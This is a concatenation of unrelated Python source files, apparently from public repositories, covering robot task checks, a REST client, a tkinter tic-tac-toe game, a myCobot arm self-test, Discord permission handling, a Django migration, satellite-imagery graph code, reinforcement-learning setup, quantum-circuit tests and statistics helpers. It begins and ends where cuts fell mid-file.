self.current_norm_distance = self.calc_distance(goal, gripper) return self.current_norm_distance < self.threshold def check_distractor_distance_threshold(self, goal, gripper): """ Check if the distance between relevant task objects is under threshold for successful task completion Returns: :return: (bool) """ self.current_norm_distance = self.calc_distance(goal, gripper) threshold = 0.1 return self.current_norm_distance < threshold def check_points_distance_threshold(self): if (self.task_type == 'pnp') and (self.env.robot_action != 'joints_gripper') and (len(self.env.robot.magnetized_objects) == 0): o1 = self.current_task_objects[0] o2 = self.current_task_objects[2] else: o1 = self.current_task_objects[0] o2 = self.current_task_objects[1] if o1 == self.env.robot: closest_points = self.env.p.getClosestPoints(o1.get_uid, o2.get_uid(), self.threshold, o1.end_effector_index, -1) elif o2 == self.env.robot: closest_points = self.env.p.getClosestPoints(o2.get_uid(), o1.get_uid(), self.threshold, o2.end_effector_index, -1) else: closest_points = self.env.p.getClosestPoints(o1.get_uid(), o2.get_uid(), self.threshold, -1, -1) if len(closest_points) > 0: return closest_points else: return False def check_goal(self): """ Check if goal of the task was completed successfully """ self.last_distance = self.current_norm_distance if self.init_distance is None: self.init_distance = self.current_norm_distance finished = None if self.task_type == 'reach': finished = self.check_distance_threshold(self._observation) if self.task_type == 'push' or self.task_type == 'throw' or self.task_type == 'pick_n_place': finished = self.check_points_distance_threshold() if self.task_type == 'poke': finished = self.check_poke_threshold(self._observation) if self.task_type == "switch": finished = self.check_switch_threshold() if self.task_type == "press": finished = self.check_press_threshold() if self.task_type == "turn": finished = self.check_turn_threshold() if self.task_type == 'pnp' and self.env.robot_action != 'joints_gripper' and finished: if len(self.env.robot.magnetized_objects) == 0: self.env.episode_over = False self.env.robot.magnetize_object(self.current_task_objects[0], finished) else: self.env.episode_over = True if self.env.episode_steps == 1: self.env.episode_info = "Task completed in initial configuration" else: self.env.episode_info = "Task completed successfully" elif (self.task_type == '2stepreach') and (False in self.subgoals) and finished: self.env.episode_info = "Subgoal {}/{} completed successfully".format(self.sub_idx+1, self.num_subgoals) self.subgoals[self.sub_idx] = True #current subgoal done self.env.episode_over = False #don't reset episode self.env.robot.magnetize_object(self.env.task_objects[self.obs_sub[self.sub_idx][0]], finished) #magnetize first object self.sub_idx += 1 #continue with next subgoal self.env.reward.reset() #reward reset elif finished: self.env.episode_over = True if self.env.episode_steps == 1: self.env.episode_info = "Task completed in initial configuration" else: self.env.episode_info = "Task completed successfully" if self.check_time_exceeded(): self.env.episode_over = True self.env.episode_failed = True if self.env.episode_steps == self.env.max_steps: if self.task_type == "turn": self.env.episode_over = True self.env.episode_failed = True if self.desired_angle == self.desired_angle-int(self.env.reward.get_angle()): self.env.episode_info = "Angle without change" else: self.env.episode_info = f"Remaining angle: {int(self.desired_angle-self.env.reward.get_angle())}" if self.check_turn_threshold() == -1: self.env.episode_over = True self.env.episode_failed = True self.env.episode_info = "Bad direction" else: self.env.episode_over = True self.env.episode_failed = True self.env.episode_info = "Max amount of steps reached" if self.reward_type != 'gt' and (self.check_vision_failure()): self.stored_observation = [] self.env.episode_over = True self.env.episode_failed = True self.env.episode_info = "Vision fails repeatedly" def calc_distance(self, obj1, obj2): """ Calculate distance between two objects Parameters: :param obj1: (float array) First object position representation :param obj2: (float array) Second object position representation Returns: :return dist: (float) Distance between 2 float arrays """ if self.distance_type == "euclidean": dist = np.linalg.norm(np.asarray(obj1) - np.asarray(obj2)) elif self.distance_type == "manhattan": dist = cityblock(obj1, obj2) return dist def calc_rotation_diff(self, obj1, obj2): """ Calculate diffrence between orientation of two objects Parameters: :param obj1: (float array) First object orientation (Euler angles) :param obj2: (float array) Second object orientation (Euler angles) Returns: :return diff: (float) Distance between 2 float arrays """ if self.distance_type == "euclidean": diff = np.linalg.norm(np.asarray(obj1) - np.asarray(obj2)) elif self.distance_type == "manhattan": diff = cityblock(obj1, obj2) return diff def generate_new_goal(self, object_area_borders, camera_id): """ Generate an image of new goal for VEA vision model. This function is supposed to be called from env workspace. Parameters: :param object_area_borders: (list) Volume in space where task objects can be located :param camera_id: (int) ID of environment camera active for image rendering """ if self.task_type == "push": random_pos = self.env.task_objects[0].get_random_object_position(object_area_borders) random_rot = self.env.task_objects[0].get_random_object_orientation() self.env.robot.reset_up() self.env.task_objects[0].set_position(random_pos) self.env.task_objects[0].set_orientation(random_rot) self.env.task_objects[1].set_position(random_pos) self.env.task_objects[1].set_orientation(random_rot) render_info = self.env.render(mode="rgb_array", camera_id = self.env.active_cameras) self.goal_image = render_info[self.env.active_cameras]["image"] random_pos = self.env.task_objects[0].get_random_object_position(object_area_borders) random_rot = self.env.task_objects[0].get_random_object_orientation() self.env.task_objects[0].set_position(random_pos) self.env.task_objects[0].set_orientation(random_rot) elif self.task_type == "reach": bounded_action = [random.uniform(-3,-2.4) for x in range(2)] action = [random.uniform(-2.9,2.9) for x in range(6)] self.env.robot.reset_joints(bounded_action + action) self.goal_image = self.env.render(mode="rgb_array", camera_id=self.env.active_cameras)[self.env.active_cameras]['image'] self.env.robot.reset_up() #self.goal_image = self.vision_module.vae_generate_sample() <gh_stars>1-10 # + import pandas from aito.client import AitoClient from aito.schema import AitoTableSchema import aito.api as aito_api from aito.utils.data_frame_handler import DataFrameHandler def format_csv_to_json( aito_client, file_path, table_name, schema=None ): """ Format CSV file to JSON """ # If schema is not given expect to get it from Aito if not schema: schema = { "type": "table", "columns": { "GL_Code": { "type": "String", "nullable": False }, "Inv_Amt": { "type": "Decimal", "nullable": False }, "Inv_Id": { "type": "Int", "nullable": False }, "Item_Description": { "type": "Text", "nullable": False, "analyzer": "english" }, "Product_Category": { "type": "String", "nullable": False }, "Vendor_Code": { "type": "String", "nullable": False } } } # Convert the data to be in correct data types by using the schema file_df = pandas.read_csv(file_path) data_frame_handler = DataFrameHandler() converted_file_df = data_frame_handler.convert_df_using_aito_table_schema( df=file_df, table_schema=schema ) # Modify NA values to be None converted_file_df = converted_file_df.where( pandas.notnull(converted_file_df), None) return converted_file_df.to_dict(orient="records") def get_schema(): schema = { "type": "table", "columns": { "GL_Code": { "type": "String", "nullable": False }, "Inv_Amt": { "type": "Decimal", "nullable": False }, "Inv_Id": { "type": "Int", "nullable": False }, "Item_Description": { "type": "Text", "nullable": False, "analyzer": "english" }, "Product_Category": { "type": "String", "nullable": False }, "Vendor_Code": { "type": "String", "nullable": False } } } return schema def predict_row(aito_client, data, predict_query): """ Use Aito predict endpoint to predict a result for the given field for a data row. """ # Use other columns than the field to be predicted to define # the where clause of the query where = { "Vendor_Code": data[1], "Inv_Amt": data[2], "Item_Description": data[3], "Product_Category": data[4] } predict_query["where"] = where # Send query to Aito predict endpoint result = aito_api.predict( client=aito_client, query=predict_query ) return { "feature": result["hits"][0]["feature"], "confidence": result["hits"][0]["$p"] } """ Created on Oct 13, 2019 @author: majdukovic """ import requests class RestClient: """ Class for dealing with generic POSTS/UPDATES/GETS/DELETES """ default_timeout = 10 def post(self, url=None, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.post(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response def put(self, url=None, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.put(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response def get(self, url=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.get(url, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response def delete(self, url, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.delete(url, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response def update(self, url, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.put(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response <gh_stars>1-10 from tkinter import * import tkinter.messagebox from ticTacToe import getAIMove,isWinner,isSpaceFree,makeMove b = ['']*10 var = ['']*10 gameBoard = ['']*10 playerLetter='X' #Change later AILetter = 'O' playerColor='red'#Will be able to change later AIColor='blue' playerMove=False startGameCheck = False moves = 0 master=Tk() def makeGUIMove(pos,board,letter): #To make the relevant move and also update the GUI accordingly makeMove(letter,board,pos) if letter is playerLetter: b[pos].config(text=letter,disabledforeground=playerColor) else: b[pos].config(text=letter,disabledforeground=AIColor) b[pos].config(state=DISABLED) #Check if winner as well! pass def checkDraw(): global moves if moves>=9: tkinter.messagebox.showinfo(title='Tic Tac Toe',message="It's a draw!") def makeAIMove(): global moves,playerMove move = getAIMove(gameBoard,AILetter) makeGUIMove(move,gameBoard,AILetter) playerMove=True moves = moves+1 if isWinner(gameBoard,AILetter): tkinter.messagebox.showinfo(title='Tic Tac Toe',message="Oops! The AI wins!") else: checkDraw() def onClick(id): global moves if not startGameCheck: startGame() return global playerMove if playerMove and isSpaceFree(id,gameBoard): playerMove=False makeGUIMove(id,gameBoard,playerLetter) moves = moves+1 if isWinner(gameBoard,playerLetter): tkinter.messagebox.showinfo(title='Tic Tac Toe',message="You Win!") else: checkDraw() makeAIMove() #check for winner else: #Do Something maybe pass def restartGame(): global gameBoard,moves,b,var,playerMove,startGameCheck for i in range(1,10): gameBoard[i]=str(i) var[i]=Variable(value=0) b[i].config(text=str(i),state=NORMAL) playerMove=False startGameCheck=False moves=0 startGame() def __init__(): global gameBoard,master #Initial setup of game board for i in range(1,10): gameBoard[i]=str(i) var[i]=Variable(value=0) b[i] = Button(master,text=str(i),font={"arial",10,"bold"},padx=2,pady=2,overrelief=RIDGE,command= lambda id=i:onClick(id)) #b[i].pack(fill=BOTH,expand=1) if i in range(1,4): b[i].grid(row=2,column=i-1,sticky=NSEW) elif i in range(4,7): b[i].grid(row=1,column=i-4,sticky=NSEW) else: b[i].grid(row=0,column=i-7,sticky=NSEW) for i in range(3): Grid.columnconfigure(master,i,weight=1,minsize=80) Grid.rowconfigure(master,i,weight=1,minsize=80) menubar = Menu(master) menubar.add_command(label='Restart Game',command=restartGame) master.config(menu=menubar) master.title("Tic Tac Toe") startGame() #Starting here def startGame(): global moves global playerMove global startGameCheck startGameCheck=True #starts the logical part of the game #We assume right now that the player starts first and is X (RED) moves=0 current = 0 #0 for player, 1 for AI if current==0: playerMove=TRUE else: makeAIMove() playerMove=False #Calls mainloop for GUI setup. Should only be called once __init__() #Inirial setup master.mainloop()from setuptools import setup, find_packages setup( name="config_utils", version="1.0", author="Alex", author_email="<EMAIL>", description="config_utils", long_description="config_utils", packages=find_packages(), include_package_data=True, zip_safe=False )# -*- coding: UTF-8 -*- #!/usr/bin/python3 from pymycobot.mycobot import MyCobot # Variables needed to initialize MyCobotPi from pymycobot import PI_PORT, PI_BAUD import time # Initialize MyCobotPi mc = MyCobot(PI_PORT, PI_BAUD) # Turn on the robot if it's not already powered on if not mc.is_power_on(): # Turn on the robot mc.power_on() # Check whether the six joints are working properly # You can also use is_servo_enable(servo_id) to change a single check if mc.is_all_servo_enable(): # Power off the robotic arm mc.power_off() # Determine whether the robotic arm is powered off if mc.is_all_servo_enable() == -1: print("The power supply of the robotic arm is normal.") else: print("Power failure of the robotic arm.") exit(0) # Power on the robotic arm mc.power_on() # Set the robotic arm to zero position zero_position = [0, 0, 0, 0, 0, 0] speed = 30 # mc.send_angles([0, 0, 0, 0, 0, 0], 30) mc.send_angles(zero_position, speed) # Get the current time start = time.time() # Determine if the robot reaches the desired position # while not mc.is_in_position([0, 0, 0, 0, 0, 0], 0): while not mc.is_in_position(zero_position, 0): # Resume robotic arm movement mc.resume() # Let the arm move for 0.5s time.sleep(0.5) # Pause robotic arm's movement mc.pause() # Determine whether the move has timed out if time.time() - start > 9: # Stop moving the robotic arm print("Arm failed to move to zero position.") # Abort procedure exit(0) # Detect the movement of the six joints for i in range(1, 7): # Move the joint point i to the right at a speed of 15 mc.jog_angle(i, 0, 15) # Move the joint point 1.5s time.sleep(1.5) # Stop joint point movement mc.jog_stop() # Move the joint point i to the left at a speed of 15 mc.jog_angle(i, 1, 15) # Move the joint point for 3s time.sleep(3) # Stop joint point movement mc.jog_stop() # Move the joint point i to the right at a speed of 15 mc.jog_angle(i, 0, 15) # Move the joint point for 1.5s time.sleep(1.5) # Stop joint point movement mc.jog_stop() print(str(i) + "No. Joint Point works normally.") # Wait 0.8s time.sleep(0.8) # Get the current time start = time.time() # Set desired position and speed desired_position = [87.27, -139.13, 153.72, -160.92, -74.44, 7.55] speed = 30 # Move the arm to desired position at given speed mc.send_angles(desired_position, speed) # Wait till the arm reaches the desired position and stops # while not mc.is_in_position([87.27, -139.13, 153.72, -160.92, -74.44, 7.55], 0): while not mc.is_in_position(desired_position, 0): # Resume the robotic arm's movement mc.resume() # Let the robotic arm move for 0.5s time.sleep(0.5) # Pause robotic arm movement mc.pause() # Determine whether the move has timed out if time.time() - start > 9: mc.stop() # Stop the robotic arm's movement break # Release all servos for i in range(1, 7): mc.release_servo(i) <reponame>scottyhq/nsidc-0731-panel<gh_stars>0 from subprocess import Popen def load_jupyter_server_extension(nbapp): """serve the notebook panel app with bokeh server""" Popen(["panel", "serve", "measures-panel.ipynb", "--allow-websocket-origin=*"]) <reponame>asleep-cult/snakecord from .basestate import BaseState from .. import http from ..flags import Permissions from ..objects.memberobject import GuildMember from ..objects.overwriteobject import PermissionOverwrite, PermissionOverwriteType from ..objects.roleobject import Role from ..snowflake import Snowflake __all__ = ('PermissionOverwriteState',) class PermissionOverwriteState(BaseState): def __init__(self, *, client, channel): super().__init__(client=client) self.channel = channel @property def everyone(self): return self.get(self.channel.guild_id) def upsert(self, data): overwrite = self.get(Snowflake(data['id'])) if overwrite is not None: overwrite.update(data) else: overwrite = PermissionOverwrite.unmarshal(data, state=self) overwrite.cache() return overwrite async def create(self, obj, *, allow, deny, type=None): json = {} obj_id = Snowflake.try_snowflake(obj) if type is not None: json['type'] = PermissionOverwriteType.try_value(type) elif isinstance(obj, GuildMember): json['type'] = PermissionOverwriteType.MEMBER elif isinstance(obj, Role): json['type'] = PermissionOverwriteType.ROLE json['allow'] = Permissions.try_value(allow) json['deny'] = Permissions.try_value(deny) await http.create_channel_permission_overwrite.request( self.client.http, channel_id=self.channel.id, overwrite_id=obj_id, json=json ) async def delete(self, overwrite): overwrite_id = Snowflake.try_snowflake(overwrite) await http.delete_channel_permission_overwrite.request( self.client.http, channel_id=self.channel.id, overwrite_id=overwrite_id ) def apply_to(self, member): if not isinstance(member, GuildMember): if self.channel.guild is None: return None member = self.channel.guild.members.get(member) if member is None: return None permissions = member.permissions.copy() if permissions.administrator: return permissions if self.everyone is not None: permissions.value |= self.everyone.allow.value permissions.value &= ~self.everyone.deny.value allow = 0 deny = 0 for role_id in member.roles.keys(): overwrite = self.get(role_id) if overwrite is not None: allow |= overwrite.allow.value deny |= overwrite.deny.value permissions.value |= allow permissions.value &= ~deny overwrite = self.get(member) if overwrite is not None: permissions.value |= permissions.allow.value permissions.value &= ~overwrite.deny.value return permissions import os from setuptools import setup, find_packages current_file_path = os.path.abspath(os.path.dirname(__file__)) readme_file_path = os.path.join(current_file_path, 'README.md') with open(readme_file_path, 'r') as f: readme = f.read() version_file_path = os.path.join(current_file_path, 'version.py') with open(version_file_path, 'rb') as f: # pylint: disable=exec-used,undefined-variable exec(compile(f.read(), version_file_path, 'exec'), globals(), locals()) version = __version__ packages = find_packages() setup( name='TransBoost', version=version, author='<NAME> and <NAME>', author_email='<EMAIL>', download_url='https://github.com/jsleb333/transboost.zip', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Intended Audience :: Education', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: MIT', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Topic :: Software Development :: Libraries', 'Topic :: Software Development :: Libraries :: Python Modules' ], packages=packages, extras_require={'Visualization': ['matplotlib'], 'Traceback Pickling': ['tblib']}, python_requires='>=3.6', description='Multiscale Boosting', long_description=readme, long_description_content_type='text/markdown', ) # -*- coding: utf-8 -*- """ 模型loss torch 实现 """ from . import loss from . import det_loss # Generated by Django 3.1.8 on 2021-04-27 10:18 from django.db import migrations, models import django.db.models.deletion import uuid class Migration(migrations.Migration): dependencies = [ ('auth', '0012_alter_user_first_name_max_length'), ('service', '0005_auto_20210415_1607'), ] operations = [ migrations.AlterField( model_name='metadatarelation', name='relation_type', field=models.CharField(blank=True, choices=[(None, '---'), ('visualizes', 'visualizes'), ('describes', 'describes'), ('harvestedThrough', 'harvestedThrough'), ('harvestedParent', 'harvestedParent'), ('publishedBy', 'publishedBy')], max_length=255, null=True), ), migrations.CreateModel( name='MapContext', fields=[ ('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)), ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created on')), ('last_modified', models.DateTimeField(null=True)), ('is_deleted', models.BooleanField(default=False)), ('is_active', models.BooleanField(default=False)), ('title', models.CharField(max_length=1000)), ('abstract', models.TextField()), ('update_date', models.DateTimeField(auto_now_add=True)), ('layer_tree', models.TextField()), ('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='auth.group')), ], options={ 'abstract': False, }, ), ] <filename>gbdxtools/ipe/interface.py import os import sys import uuid import json from hashlib import sha256 from itertools import chain from collections import OrderedDict import operator from functools import partial import numpy as np import gbdxtools as gbdx from gbdxtools.ipe.util import IPE_TO_DTYPE from gbdxtools.ipe.graph import VIRTUAL_IPE_URL, register_ipe_graph, get_ipe_metadata from gbdxtools.images.meta import DaskMeta from gbdxtools.auth import Auth from gbdxtools.ipe.fetch import easyfetch as load_url import warnings warnings.filterwarnings('ignore') try: basestring except NameError: basestring = str try: xrange except NameError: xrange = range NAMESPACE_UUID = uuid.NAMESPACE_DNS class ContentHashedDict(dict): @property def _id(self): _id = str(uuid.uuid5(NAMESPACE_UUID, self.__hash__())) return _id def __hash__(self): dup = OrderedDict({k:v for k,v in self.items() if k is not "id"}) return sha256(str(dup).encode('utf-8')).hexdigest() def populate_id(self): self.update({"id": self._id}) class DaskProps(object): def graph(self): pass @property def metadata(self): assert self.graph() is not None if self._ipe_meta is not None: return self._ipe_meta if self._interface is not None: self._ipe_meta = get_ipe_metadata(self._interface.gbdx_futures_session, self._ipe_id, self._id) return self._ipe_meta @property def dask(self): token = self._interface.gbdx_connection.access_token _chunks = self.chunks _name = self.name img_md = self.metadata["image"] return {(_name, 0, y - img_md['minTileY'], x - img_md['minTileX']): (load_url, url, token, _chunks) for (y, x), url in self._collect_urls().items()} @property def name(self): return "image-{}".format(self._id) @property def chunks(self): img_md = self.metadata["image"] return (img_md["numBands"], img_md["tileYSize"], img_md["tileXSize"]) @property def dtype(self): try: data_type = self.metadata["image"]["dataType"] return IPE_TO_DTYPE[data_type] except KeyError: raise TypeError("Metadata indicates an unrecognized data type: {}".format(data_type)) @property def shape(self): img_md = self.metadata["image"] return (img_md["numBands"], (img_md["maxTileY"] - img_md["minTileY"] + 1)*img_md["tileYSize"], (img_md["maxTileX"] - img_md["minTileX"] + 1)*img_md["tileXSize"]) def _ipe_tile(self, x, y, ipe_id, _id): return "{}/tile/{}/{}/{}/{}/{}.tif".format(VIRTUAL_IPE_URL, "idaho-virtual", ipe_id, _id, x, y) def _collect_urls(self): img_md = self.metadata["image"] ipe_id = self._ipe_id _id = self._id return {(y, x): self._ipe_tile(x, y, ipe_id, _id) for y in xrange(img_md['minTileY'], img_md["maxTileY"]+1) for x in xrange(img_md['minTileX'], img_md["maxTileX"]+1)} class Op(DaskProps, DaskMeta): def __init__(self, name, interface=None): self._operator = name self._edges = [] self._nodes = [] self._ipe_id = None self._ipe_graph = None self._ipe_meta = None self._interface = interface @property def _id(self): return self._nodes[0]._id def __call__(self, *args, **kwargs): if len(args) > 0 and all([isinstance(arg, gbdx.images.ipe_image.IpeImage) for arg in args]): return self._ipe_image_call(*args, **kwargs) self._nodes = [ContentHashedDict({ "operator": self._operator, "_ancestors": [arg._id for arg in args], "parameters": OrderedDict({ k:json.dumps(v, sort_keys=True) if not isinstance(v, basestring) else v for k,v in sorted(kwargs.items(), key=lambda x: x[0])}) })] for arg in args: self._nodes.extend(arg._nodes) self._edges = [ContentHashedDict({"index": idx + 1, "source": arg._nodes[0]._id, "destination": self._nodes[0]._id}) for idx, arg in enumerate(args)] for arg in args: self._edges.extend(arg._edges) for e in chain(self._nodes, self._edges): e.populate_id() return self def _ipe_image_call(self, *args, **kwargs): out = self(*[arg.ipe for arg in args], **kwargs) ipe_img = gbdx.images.ipe_image.IpeImage(out) return ipe_img def graph(self, conn=None): if(self._ipe_id is not None and self._ipe_graph is not None): return self._ipe_graph _nodes = [{k:v for k,v in node.items() if not k.startswith('_')} for node in self._nodes] graph = { "edges": self._edges, "nodes": _nodes } if self._interface is not None and conn is None: conn = self._interface.gbdx_futures_session if conn is not None: self._ipe_id = register_ipe_graph(conn, graph) self._ipe_graph = graph self._ipe_meta = get_ipe_metadata(conn, self._ipe_id, self._id) return self._ipe_graph return graph class Ipe(object): def __getattr__(self, name): return Op(name=name, interface=Auth()) <filename>learner.py import time import numpy as np from random import uniform from keras.models import Sequential from keras.layers.core import Dense from keras.optimizers import Adam from MountainCar import MountainCar class Learner(object): def __init__(self, start, goal, Xrange, Vrange, num_actions, max_memory, hidden_size, learning_rate, discount_factor, epsilon): self.env = MountainCar(start, goal, Xrange, Vrange) self.num_actions = num_actions self.max_memory = max_memory self.hidden_size = hidden_size self.learning_rate = learning_rate self.discount_factor = discount_factor self.epsilon = epsilon self.memory = [] self.episodes = [] def build_model(self, input_size=2): model = Sequential() model.add(Dense(self.hidden_size, input_shape=(input_size, ), activation="relu")) if self.hidden_size <= 100: model.add(Dense(self.hidden_size, activation="sigmoid")) model.add(Dense(self.num_actions, activation="linear")) model.compile(Adam(lr=self.learning_rate), "mse") return model def get_initial_state(self): lhand, rhand = self.env.start[0] * 0.8, self.env.start[0] * 1.2 start = round(uniform(lhand, rhand), 2) self.env.state = np.array([start, self.env.start[1]]) # Reset env return self.env.observe() def remember(self, experience): # experience (DoubleQ) -> [[state, action, reward, next_state], game_over] # experience (Sarsa) -> [[state, action, reward], game_over] self.memory.append(experience) if len(self.memory) > self.max_memory: del self.memory[0] @staticmethod def print_time_passed(start_time): time_passed = time.time() - start_time print("Time passed: %.3f seconds.." % time_passed) <filename>Modulo-02/ex050/ex050.py soma = cont = 0 for c in range(1,7): n = int(input(f'digite o {c}° valor: ')) if n % 2 == 0: soma += n cont += 1 print(f'A soma dos {cont} valores pares é {soma}') n = int(input()) l = list(map(int,input().split())) ans = 0 flag = 0 for i in range(1, n): if l[i] < l[i-1]: ans = n-i flag += 1 if (flag == 1 and l[0] >= l[-1]) or flag == 0: print(ans) else: print(-1)# Copyright 2019-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. import numpy as np import pytest from braket.circuits import Observable, QuantumOperator, StandardObservable @pytest.fixture def observable(): return Observable(qubit_count=1, ascii_symbols=["foo"]) @pytest.fixture def standard_observable(): return StandardObservable(qubit_count=1, ascii_symbols=["foo"]) def test_is_operator(observable): assert isinstance(observable, QuantumOperator) @pytest.mark.xfail(raises=ValueError) def test_qubit_count_lt_one(): Observable(qubit_count=0, ascii_symbols=[]) @pytest.mark.xfail(raises=ValueError) def test_none_ascii(): Observable(qubit_count=1, ascii_symbols=None) @pytest.mark.xfail(raises=ValueError) def test_mismatch_length_ascii(): Observable(qubit_count=1, ascii_symbols=["foo", "bar"]) def test_name(observable): expected = observable.__class__.__name__ assert observable.name == expected def test_getters(): qubit_count = 2 ascii_symbols = ("foo", "bar") observable = Observable(qubit_count=qubit_count, ascii_symbols=ascii_symbols) assert observable.qubit_count == qubit_count assert observable.ascii_symbols == ascii_symbols @pytest.mark.xfail(raises=AttributeError) def test_qubit_count_setter(observable): observable.qubit_count = 10 @pytest.mark.xfail(raises=AttributeError) def test_ascii_symbols_setter(observable): observable.ascii_symbols = ["foo", "bar"] @pytest.mark.xfail(raises=AttributeError) def test_name_setter(observable): observable.name = "hi" @pytest.mark.xfail(raises=NotImplementedError) def test_to_ir_not_implemented_by_default(observable): observable.to_ir() @pytest.mark.xfail(raises=NotImplementedError) def test_to_matrix_not_implemented_by_default(observable): observable.to_matrix(None) @pytest.mark.xfail(raises=NotImplementedError) def test_basis_rotation_gates_not_implemented_by_default(observable): observable.basis_rotation_gates @pytest.mark.xfail(raises=NotImplementedError) def test_eigenvalues_not_implemented_by_default(observable): observable.eigenvalues def test_str(observable): expected = "{}('qubit_count': {})".format(observable.name, observable.qubit_count) assert str(observable) == expected def test_register_observable(): class _FooObservable(Observable): def __init__(self): super().__init__(qubit_count=1, ascii_symbols=["foo"]) Observable.register_observable(_FooObservable) assert Observable._FooObservable().name == _FooObservable().name def test_matmul_observable(): o1 = Observable.I() o2 = Observable.Z() o3 = o1 @ o2 assert isinstance(o3, Observable.TensorProduct) assert o3.qubit_count == 2 assert o3.to_ir() == ["i", "z"] assert o3.ascii_symbols == ("I@Z", "I@Z") @pytest.mark.xfail(raises=ValueError) def test_matmul_non_observable(): Observable.I() @ "a" def test_observable_equality(): o1 = Observable.I() o2 = Observable.I() o3 = Observable.Z() o4 = "a" assert o1 == o2 assert o1 != o3 assert o1 != o4 def test_standard_observable_subclass_of_observable(standard_observable): assert isinstance(standard_observable, Observable) def test_standard_observable_eigenvalues(standard_observable): assert np.allclose(standard_observable.eigenvalues, np.array([1, -1])) """This package defines the `picharsso draw` command. Refer to https://kelvindecosta.github.io/picharsso/commands/draw/. """ import click from PIL import Image from ...draw import RESAMPLING_FILTERS, DEFAULT_RESAMPLING from ...format import FORMATTERS, DEFAULT_FORMATTER from ...utils import terminal_size from .gradient import draw_gradient from .braille import draw_braille @click.group(options_metavar="[options]", subcommand_metavar="<command> [args]") @click.argument("path", type=click.Path(exists=True), metavar="<path>") @click.option( "-c", "--colorize", is_flag=True, help="Apply image colors to output text." ) @click.option( "-m", "--mode", type=click.Choice(list(FORMATTERS.keys())), default=DEFAULT_FORMATTER, help="Format mode for output text.", show_default=True, ) @click.option( "-r", "--resample", type=click.Choice(list(RESAMPLING_FILTERS.keys())), default=DEFAULT_RESAMPLING, help="Resampling filter.", show_default=True, ) @click.option( "-H", "--height", type=int, default=0, help="Height of output text in characters.\n\nIf 0, derives from width.", show_default=True, ) @click.option( "-W", "--width", type=int, default=0, help="Width of output text in characters.\n\nIf 0, derives from height.", show_default=True, ) @click.option( "-term-h", "--terminal-height", is_flag=True, help="Sets height to terminal height.", ) @click.option( "-term-w", "--terminal-width", is_flag=True, help="Sets width to terminal width.", ) @click.pass_context def draw( context, path, colorize, mode, resample, height, width, terminal_height, terminal_width, ): """Generate text art from an image. <path> Path to the image file. """ image = Image.open(path) if terminal_width or terminal_height or height == 0 and width == 0: term_h, term_w = terminal_size() if terminal_height: height = term_h if terminal_width: width = term_w if height == 0 and width == 0: height = term_h width = term_w context.obj = { "image": image, "colorize": colorize, "mode": mode, "resample": resample, "height": height, "width": width, } draw.add_command(draw_gradient) draw.add_command(draw_braille) <gh_stars>1-10 # Copyright (c) Gradient Institute. All rights reserved. # Licensed under the Apache 2.0 License. """Extra statistical functions.""" import numpy as np from sklearn.linear_model import LinearRegression def conditional_cov(X, Y, estimator=None, bias=False, ddof=None): r"""Compute the conditional covariance, COV(Y|X). This computes: COV(Y|X) = E[(Y - E[Y|X]) (Y - E[Y|X]).T | X] = COV(R) where R = Y - E[Y|X] E[Y|X] is computed using a regression estimate, you have the option of providing the estimator. The last line can be derived from noting the law of total expectation, E[R] = E[Y - E[Y|X]] = E[Y] - E[E[Y|X]], where E[E[Y|X]] = E[Y] = 0 So COV(R) = E[(R - E[R]) (R - E[R]).T | X] = E[R R.T | X] = COV(Y|X) Parameters ---------- X: ndarray, DataFrame A two-dimensional (n, p) array of conditioning variables. Y: ndarray, DataFrame A two-dimensional (n, d) array of variables. estimator: optional, scikit learn multiple output regression estimator A multiple output regression estimator. By default this is a LinearRegression estimator. This is to compute the relationship E[Y|X] for the conditional covariance. bias: bool How to normalise the covariance matrix. See numpy.cov for more details. ddof: optional, int The degrees of freedom to use for normalisation. See numpy.cov for more details. Returns ------- ndarray a (d, d) symmetric positive definite matrix of the conditional covariance between the columns of Y, COV(Y|X). """ if estimator is None: estimator = LinearRegression() EY_X = estimator.fit(X, Y).predict(X) RY = Y - EY_X cov = np.cov(RY.T, bias=bias, ddof=ddof) # equal E[(Y-E[Y|X])(Y-E[Y|X]).T] return cov def conditional_corrcoef(X, Y, estimator=None): r"""Compute the conditional correlation, CORR(Y|X). This is the normalised covariance, CORR_i,j = COV_i,j / sqrt(Var_i, Var_j) Parameters ---------- X: ndarray, DataFrame A two-dimensional (n, p) array of conditioning variables. Y: ndarray, DataFrame A two-dimensional (n, d) array of variables. estimator: optional, scikit learn multiple output regression estimator A multiple output regression estimator. By default this is a LinearRegression estimator. This is to compute the relationship E[Y|X] for the conditional covariance. Returns ------- ndarray a (d, d) symmetric matrix of the conditional correlation between the columns of Y, CORR(Y|X). """ cov = conditional_cov(X, Y, estimator) var = np.diag(cov) corr = cov / np.sqrt(np.outer(var, var)) return corr from django.shortcuts import render_to_response def home(request): return render_to_response('blog/index.html') def blog(request): return render_to_response('blog/blog.html')<gh_stars>1-10 """The WaveBlocks Project This file contains data to build several closely related processing splitting methods. @author: <NAME>, <NAME> @copyright: Copyright (C) 2014 <NAME> @license: Modified BSD License """ from 